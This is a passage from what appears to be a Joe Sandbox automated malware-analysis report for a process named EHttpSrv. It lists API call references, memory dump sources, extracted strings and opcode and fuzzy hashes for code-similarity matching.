                                                                                                                • #774.MFC80U(00000000,?,00000000,20479989,000000FF,2044D616), ref: 2044D93B
                                                                                                                • #578.MFC80U(?,00000000,20479989,000000FF,2044D616), ref: 2044D94D
                                                                                                                • #1236.MFC80U(...,?,00000000,20479989,000000FF,2044D616), ref: 2044D95A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1236#3990#578#774
                                                                                                                • String ID: ...
                                                                                                                • API String ID: 899038673-440645147
                                                                                                                • Opcode ID: 28ee0e0e95ed9453771ffe66ed81ba7c4483bbcdf2d3f5ce2050e615fe0b29e5
                                                                                                                • Instruction ID: 5373712dfce97079d76891927ad7678fd32071b7dc647f24b25153347c72ce09
                                                                                                                • Opcode Fuzzy Hash: 28ee0e0e95ed9453771ffe66ed81ba7c4483bbcdf2d3f5ce2050e615fe0b29e5
                                                                                                                • Instruction Fuzzy Hash: DDF06DB5108A40EFD305DF04CD84B2ABBE8FB88B25F008E2CF456823E0DB3C5A04CA42
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsstr
                                                                                                                • String ID: 0$DELETE$DELETE=1$TiH
                                                                                                                • API String ID: 2735924446-925229115
                                                                                                                • Opcode ID: 68c5d955a3c88ee057bc51f0b690206c4601981c66816eccda9a2ea4ed6d696d
                                                                                                                • Instruction ID: 36bfe8ecc8532c90e75d599914e160e591052902f4073c0fc9fa8b5ab0026c70
                                                                                                                • Opcode Fuzzy Hash: 68c5d955a3c88ee057bc51f0b690206c4601981c66816eccda9a2ea4ed6d696d
                                                                                                                • Instruction Fuzzy Hash: CD91A4B1A006149FCB10CF98EC80B9AB7B4EF54314F8482EDEA05A7352D7789E85CF55
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                  • Part of subcall function 20404CB0: wcsncpy_s.MSVCR80 ref: 20404CEA
                                                                                                                • wcsstr.MSVCR80 ref: 2042F1A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_swcsncpy_swcsstr
                                                                                                                • String ID: 0$DELETE$DELETE=1$TiH
                                                                                                                • API String ID: 311962889-925229115
                                                                                                                • Opcode ID: 6de001f378f2d674e41ac09f3baf5954175bde3fd077e12621cfe321a923b03b
                                                                                                                • Instruction ID: c816f1638251860e255fec58d209106db8c5ff8e578f00fddaf8b93408f4d45d
                                                                                                                • Opcode Fuzzy Hash: 6de001f378f2d674e41ac09f3baf5954175bde3fd077e12621cfe321a923b03b
                                                                                                                • Instruction Fuzzy Hash: E99182B5A00619DFCB20CF94DD80B99B7B5BF88204F9482E9EA0967341D734AF45CF65
                                                                                                                APIs
                                                                                                                • #1176.MFC80U(FEEA6C22,-00003A6C,-00003AB4,?,?,2047F4A8,000000FF,2044F9B2,-00003AB4,?), ref: 20463F8E
                                                                                                                • #764.MFC80U(?), ref: 20463FCA
                                                                                                                • #764.MFC80U(?), ref: 20463FDB
                                                                                                                • #764.MFC80U(?), ref: 20463FEC
                                                                                                                • #764.MFC80U(?), ref: 20463FFD
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764$#1176
• String ID:
• API String ID: 987861311-0
• Opcode ID: 14f07787d7d781585720ef2c76eb071abde77c01d8e2852b6f52fc6dd90be62f
• Instruction ID: a98070125c487795d5e1c1e41b76c1b437769026aba7d230c424ffc06d12d48c
• Instruction Fuzzy Hash: 2E419E71A043459BC714DFA8C8C0B9AB3F5AFA5A48F40C92CF92487255F739EA09CB91
APIs
  • Part of subcall function 2042D280: #354.MFC80U(00000097,20428001,FEEA6C22,20428001,000000FF,20479D18,000000FF,20422C46,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF), ref: 2042D2AD
• #416.MFC80U(?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057,?,00000000,00000000,00000000,00000000,0000015E,00000000), ref: 2046C5D8
  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
  • Part of subcall function 20423810: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C5E,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF,20428001), ref: 20423837
• #563.MFC80U(?,?,?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057,?,00000000,00000000,00000000,00000000), ref: 2046C63B
• #563.MFC80U(?,?,?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057,?,00000000,00000000,00000000,00000000), ref: 2046C64B
  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
• #1079.MFC80U(?,?,?,?,?,?,?,?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057), ref: 2046C6BE
• LoadAcceleratorsW.USER32(?,0000008A), ref: 2046C6CC
Similarity
• API ID: #310#557#563Load$#1079#354#416#530#572#6003AcceleratorsCursorEmptyRect
• String ID:
• API String ID: 117230559-0
• Opcode ID: f28c4c780984babebea40927c8fc153bc9f58949aae5e3684a3fe37845274eea
• Instruction ID: 8df188cfc0f7d2dff96fac6e1b3f3a4b29b502d6c609d554b63601a0c70ab361
• Instruction Fuzzy Hash: B6412B71509B808ED310CF74D544B9BFBE4AFA5B08F048E4DE4DA97251C778A508CBA3
APIs
• GetCurrentObject.GDI32(?,00000006), ref: 204314A2
• GetObjectW.GDI32(00000000,0000005C,?), ref: 204314BA
• CreateFontIndirectW.GDI32(?), ref: 20431543
• SelectObject.GDI32(?,00000000), ref: 20431553
• DeleteObject.GDI32(00000000), ref: 2043155A
Similarity
• API ID: Object$CreateCurrentDeleteFontIndirectSelect
• String ID:
• API String ID: 50039150-0
• Opcode ID: 026ec79d7094d8a6f952af61633666c1d8a61d2f72d75d7ce869e004ac234820
• Instruction ID: d9b3a9d93c16308a6b1df22556706bd8d4e25d073b5324bc4cf5619c2a00a30a
• Instruction Fuzzy Hash: 8921043140C740ABC211CFA48954B6B7BD4AFDEB4CF20A91CFA8697361DB2CC9058793
APIs
• #314.MFC80U(00000000,FEEA6C22), ref: 20443383
• #310.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047C8A1), ref: 204433DF
• #4026.MFC80U(00000176), ref: 204433F3
• #578.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047C8A1), ref: 2044340B
  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
• #6751.MFC80U(00000000,?), ref: 2044345B
Similarity
• API ID: #6751$#310#314#4026#578
• String ID:
• API String ID: 1182657103-0
• Opcode ID: 919f7780caee2980bc3da968e62253433011368395cdbebddbc3a6bb4ace46c1
• Instruction ID: d5c34774d3e3678e067be1a01ecc7778953f0c800ade90182d4a99d713b34071
• Instruction Fuzzy Hash: B1318C316087419BD314CF54D884BAABBE0FBA4B29F10CB2DF8A5436E0DB399904CA46
APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 040aff806755fcecff898535f29387a8eec72c5b727a23081639e353423ce75a
• Instruction ID: cdf0b8556220d5f65de270d08de19bbd4e4139c6ff79a35e881a18613564584c
• Instruction Fuzzy Hash: 1E114C716006108BD730DF95C880A5773F6AB88310F25997DDD4A87210D73DFD49DBA2
APIs
Similarity
• API ID: #3064memset$#6361
• String ID:
• API String ID: 4293083676-0
• Opcode ID: b92684f67381bc14c3d4f75ce0dc2221cd5d245a442cc12f69b557ce1c2757f0
• Instruction ID: 0702784574e55f6291f664e765b2f929f8af4fcd1af1c7acafbc4c6a93329a04
• Instruction Fuzzy Hash: 0A112670709B408BE720ABA4D825B9B77F27F60B08F11C41ED556572A0DBBDA4818791
APIs
• #764.MFC80U(?,?,2046787F), ref: 2041E00B
• #764.MFC80U(?,?,2046787F), ref: 2041E024
• #764.MFC80U(?,?,2046787F), ref: 2041E03D
• #764.MFC80U(?,?,2046787F), ref: 2041E056
• #764.MFC80U(?,?,2046787F), ref: 2041E06F
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 5cdd4422dfb11c58f9158799d8e4986ffe300afca717e2e9f41fc0aaa154c452
• Instruction ID: a45c504ce9664a0af5def6404d9244c2f5a598a96061cf544b85d7e9c55dab90
• Instruction Fuzzy Hash: 2511A8F1D01B108BC6719F5B9981817FBF9BFA46007949D1EE18AC2A20D3B9F4848F51
APIs
• #764.MFC80U(00000000,?,00000001,?,?,20462D01), ref: 204129EE
• #764.MFC80U(20462D01,?,00000001,?,?,20462D01), ref: 204129FE
• #764.MFC80U(?,?,00000001,?,?,20462D01), ref: 20412A0E
• #764.MFC80U(?,?,00000001,?,?,20462D01), ref: 20412A1E
• #764.MFC80U(?,?,?,20462D01), ref: 20412A37
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 3601c3366580da7bba9342901ffdafa328c0f1da6d4fcc88da08de05a8ecddd4
                                                                                                                • Instruction ID: 3b3e0f5020365ef418d4e4a8d25d9515d89a794e690bf130ed1b31d4d5b1dce2
                                                                                                                • Opcode Fuzzy Hash: 3601c3366580da7bba9342901ffdafa328c0f1da6d4fcc88da08de05a8ecddd4
                                                                                                                • Instruction Fuzzy Hash: B8014CF2E007129BD6319EE49E41A57F3A86F10584B04C828E919E7600E63DF9A4CAE2
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 204385CB
                                                                                                                • #2366.MFC80U(00000000), ref: 204385D2
                                                                                                                • #2648.MFC80U(00000000), ref: 204385F6
                                                                                                                • #2648.MFC80U(00000000), ref: 20438601
                                                                                                                • SendMessageW.USER32(?,0000004E,00000000,00000000), ref: 20438616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2648$#2366MessageParentSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 618804366-0
                                                                                                                • Opcode ID: cd4e2aa80283902dd658a5a69b0aa514c0ff9a341a78e5f375abb5c017dea3f9
                                                                                                                • Instruction ID: 6b27879f19521a8650714e7d031745b5b5e2419dbccdf476676730fdb6f9a243
                                                                                                                • Opcode Fuzzy Hash: cd4e2aa80283902dd658a5a69b0aa514c0ff9a341a78e5f375abb5c017dea3f9
                                                                                                                • Instruction Fuzzy Hash: 12011EB26043049BCB04DFA8C895A6BB7A9FB88714F10896DFD598B680DB75E904CB91
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,?,00000000,20479929,000000FF,2045A0D6,00000000), ref: 2045A318
                                                                                                                • #6232.MFC80U(00000001), ref: 2045A32A
                                                                                                                • #4026.MFC80U(?,00000001), ref: 2045A357
                                                                                                                • #5803.MFC80U(000003FC,?,?,00000001), ref: 2045A369
                                                                                                                • #578.MFC80U(000003FC,?,?,00000001), ref: 2045A37A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578#5803#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 1453617869-0
                                                                                                                • Opcode ID: f98708d631100de7f398db51057dde8a6b5c887a45a5df038a9467d1af8224b6
                                                                                                                • Instruction ID: 21f2922d4e9f85d5c6767d76ba903275e276ecd49b4a8d21b2b4aacec48a433f
                                                                                                                • Opcode Fuzzy Hash: f98708d631100de7f398db51057dde8a6b5c887a45a5df038a9467d1af8224b6
                                                                                                                • Instruction Fuzzy Hash: 86012D75108A01AFD314DF58DC94BABB7E4FB84719F108A2EF5A6477A0DF39A908CB41
                                                                                                                APIs
                                                                                                                • #1921.MFC80U(FEEA6C22,?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D66F
                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 2045D67B
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                • #658.MFC80U(?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D69C
                                                                                                                • #651.MFC80U(?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D6A8
                                                                                                                • #605.MFC80U(?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D6B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1921#6003#605#651#658#722AcceleratorDestroyTablefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 3189193943-0
                                                                                                                • Opcode ID: 074fffb333143394038fb696c20330bed956ab92d4bab4a04e213e4ffb927463
                                                                                                                • Instruction ID: 6615b9cedfd4d8d6a70bf06ef8f864a55d9fe342bd741bf547e0d738b5018bca
                                                                                                                • Opcode Fuzzy Hash: 074fffb333143394038fb696c20330bed956ab92d4bab4a04e213e4ffb927463
                                                                                                                • Instruction Fuzzy Hash: 6501A1701087808FD315CF28C895BAABBE4FB90618F50891DF096832A1DB786509CBD2
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,00000000,FEEA6C22), ref: 20459477
                                                                                                                • #6232.MFC80U(00000001), ref: 204594A1
                                                                                                                • #4026.MFC80U(?,00000001), ref: 204594BA
                                                                                                                • #5803.MFC80U(00000413,?,00000001), ref: 204594CC
                                                                                                                • #578.MFC80U(00000413,?,00000001), ref: 204594DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578#5803#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 1453617869-0
                                                                                                                • Opcode ID: f86256a3efc04a42eacee18c2d2bea885fb2b4719f2c3ecb3668a5cd64f5898e
                                                                                                                • Instruction ID: 9bd44db928dee0b38f906c4aee4a3c82d3db633600cc66f3fe952941ce938208
                                                                                                                • Opcode Fuzzy Hash: f86256a3efc04a42eacee18c2d2bea885fb2b4719f2c3ecb3668a5cd64f5898e
                                                                                                                • Instruction Fuzzy Hash: 500157B5108A00ABD304DF54C985B9BBBE4FB84B18F008A1DF452966D0DB799908CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • wcsncmp.MSVCR80 ref: 2042E8DB
                                                                                                                • wcsncmp.MSVCR80 ref: 2042E908
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsncmp$wcscpy_s
                                                                                                                • String ID: HKCU\$HKLM\
                                                                                                                • API String ID: 2575004286-2581276437
                                                                                                                • Opcode ID: 05a45e9ad9c39bae23c1861ea01fe15063871978b02da57fcb3f0cf2ca2bab6a
                                                                                                                • Instruction ID: 9477c974d03e298546535f001272ddac06e554d7a7f1493319765a10b8f416ab
                                                                                                                • Opcode Fuzzy Hash: 05a45e9ad9c39bae23c1861ea01fe15063871978b02da57fcb3f0cf2ca2bab6a
                                                                                                                • Instruction Fuzzy Hash: 07919EB1A00648DFCB14CF95E880BEEB7B1BF48308F54C169ED156B386D7389A45CBA5
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20455983
                                                                                                                • #6232.MFC80U(00000001,00000000,FEEA6C22), ref: 20455991
                                                                                                                • #6751.MFC80U(00000000,00000001), ref: 20455B32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #314#6232#6751
                                                                                                                • String ID: DetectAppChanging
                                                                                                                • API String ID: 2722654210-2516610685
                                                                                                                • Opcode ID: b7f6271265944db94faaadf3a698083846833aab4ebac0db9ee8707db7b2ab85
                                                                                                                • Instruction ID: 9ed9b2dda144238cdeb4c173259532dea9aa329e793ebb0550c710b0c65b3c42
                                                                                                                • Opcode Fuzzy Hash: b7f6271265944db94faaadf3a698083846833aab4ebac0db9ee8707db7b2ab85
                                                                                                                • Instruction Fuzzy Hash: C6517E715087418FC314CFA8C5D1AABFBE1FB94754F108A2EF29A87291D738E849CB12
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043A150: free.MSVCR80 ref: 2043A164
                                                                                                                  • Part of subcall function 2043A150: malloc.MSVCR80 ref: 2043A18A
                                                                                                                  • Part of subcall function 2043A150: memcpy.MSVCR80(?,?,?), ref: 2043A1A9
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,FEEA6C22), ref: 2043EB30
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,FEEA6C22), ref: 2043EBC2
                                                                                                                • #1176.MFC80U(?,FEEA6C22), ref: 2043EC2F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$#1176EnterLeavefreemallocmemcpy
                                                                                                                • String ID: gfff
                                                                                                                • API String ID: 4100045392-1553575800
                                                                                                                • Opcode ID: 64efc84ac7f6c0c395452fcad5ca3549b208dd17e4628c0b1fb12a9484cd8484
                                                                                                                • Instruction ID: bfe25518644de768d182e323753ab60f9fc9b9fc0b8f3c8177bbc63c303b0321
                                                                                                                • Opcode Fuzzy Hash: 64efc84ac7f6c0c395452fcad5ca3549b208dd17e4628c0b1fb12a9484cd8484
                                                                                                                • Instruction Fuzzy Hash: 2E41D0712087858FD705CFAAC880B8BB7E5AF88714F14CA1CE89687391D738F945CB91
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: wcscpy_s
• String ID: <
• API String ID: 4009619764-3887346652
• Opcode ID: e04a5b232591d9ffbf860a7328188433d2a46c3e7e538cd84ba0cecbcb35da20
• Instruction ID: d6ccd733044bd11b1b099a1abc239f885c02b4958a0f254662bc588efb38c9b5
• Opcode Fuzzy Hash: e04a5b232591d9ffbf860a7328188433d2a46c3e7e538cd84ba0cecbcb35da20
• Instruction Fuzzy Hash: E33148B2A0423147CB183B5CEC8079A73F0DF95325F198169EF01DF38AE678AD4296D5
APIs
• _snwprintf_s.MSVCR80 ref: 20417F25
• _snwprintf_s.MSVCR80 ref: 20417F59
• #1176.MFC80U(?,?,?,20413EEB,00000002,?), ref: 20417F80
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: _snwprintf_s$#1176
